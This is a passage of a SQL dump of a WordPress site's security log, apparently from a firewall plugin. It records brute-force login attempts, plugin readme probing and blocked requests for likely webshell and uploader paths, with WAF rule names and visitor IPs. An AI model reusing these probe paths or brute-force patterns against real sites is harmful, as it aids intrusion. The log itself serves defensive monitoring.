User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134944,1700443448.888565,1700443448.862900,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/woocommerce-payments/readme.txt','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134880,1700372655.861697,1700372655.823100,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134881,0.000000,1700373574.048301,0x00000000000000000000FFFFA7AC42BD,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134882,0.000000,1700374403.356088,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134883,0.000000,1700374404.185080,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134884,0.000000,1700374404.994930,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134885,0.000000,1700374405.825187,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134886,0.000000,1700374407.155252,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134887,0.000000,1700374407.501752,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134888,0.000000,1700374407.863041,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134889,0.000000,1700374408.205969,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134890,0.000000,1700374408.539238,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134891,0.000000,1700374408.872740,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134892,0.000000,1700374409.212677,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134893,0.000000,1700374409.546675,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134894,0.000000,1700374409.899804,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134895,0.000000,1700374410.240574,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134896,0.000000,1700374410.578463,0x00000000000000000000FFFF67F14254,0,200,0,0,0,'https://eckankar-colorado.org//wp-login.php','https://eckankar-colorado.org//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134897,1700375432.045621,1700375432.005900,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/admin/plugins/elfinder/php/connector.minimal.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluL3BsdWdpbnMvZWxmaW5kZXIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134899,0.000000,1700376063.679116,0x00000000000000000000FFFF334DE61D,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134900,0.000000,1700378537.934575,0x00000000000000000000FFFF6883B115,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailInvalidUsername',NULL,NULL),(134898,0.000000,1700375594.362006,0x00000000000000000000FFFFCAA6CE23,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://raceannouncing.com/wp-login.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(134901,0.000000,1700380980.081272,0x00000000000000000000FFFFA1237CFB,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134902,0.000000,1700383058.656329,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134903,0.000000,1700383059.770066,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134904,0.000000,1700383060.779403,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134905,0.000000,1700383061.839700,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134906,0.000000,1700383411.502396,0x00000000000000000000FFFFA747EADE,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134907,0.000000,1700383713.067911,0x00000000000000000000FFFF2D8E6BB5,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134908,1700385652.879324,1700385652.854300,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134946,1700445536.531280,1700445536.492100,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Text/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RleHQvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134909,1700385652.878805,1700385652.854300,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134911,1700387386.054990,1700387386.031000,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3AtYXB4dXB4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134910,0.000000,1700385857.773213,0x00000000000000000000FFFF416DC1F8,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134912,1700387377.925215,1700387377.886000,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hcHh1cHgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134943,1700443448.888802,1700443448.862900,0x00000000000000000000FFFFC3141064,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/woocommerce-payments/readme.txt','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134913,1700387358.713670,1700387358.688900,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFweHVweC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134914,1700387354.007938,1700387353.968100,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134915,0.000000,1700388317.599300,0x00000000000000000000FFFF5CCC8A1C,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134916,1700392169.245103,1700392169.220000,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134917,1700392169.244892,1700392169.220000,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134918,0.000000,1700393295.116643,0x00000000000000000000FFFF976A26A6,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134919,0.000000,1700395056.766191,0x00000000000000000000FFFF8AC503AC,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134920,0.000000,1700397595.763085,0x00000000000000000000FFFFD06193DF,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134921,1700401218.472069,1700401218.430600,0x00000000000000000000FFFF8A44A694,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/upfile.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3VwZmlsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134939,0.000000,1700439281.263649,0x00000000000000000000FFFF36EB0A6B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134940,1700440872.413611,1700440872.395100,0x00000000000000000000FFFF2D4FC0AF,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/install.php','http://eckankar-colorado.org//wp-admin/install.php','Go-http-client/2.0','blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134947,1700445902.141915,1700445902.103700,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134922,1700401217.896558,1700401217.858000,0x00000000000000000000FFFF8A44A694,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/upfile.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvdXBmaWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134923,1700409941.147505,1700409941.108800,0x00000000000000000000FFFFBC865061,0,403,0,0,0,'https://eckankar-colorado.org/hucolorado',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjQ1LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDUuMA==\",\"path\":\"L2h1Y29sb3JhZG8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134924,1700422008.276159,1700422008.251100,0x00000000000000000000FFFF3E8D26D7,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134925,1700422008.275934,1700422008.251100,0x00000000000000000000FFFF3E8D26D7,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134926,0.000000,1700423474.639452,0x00000000000000000000FFFF18905108,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; 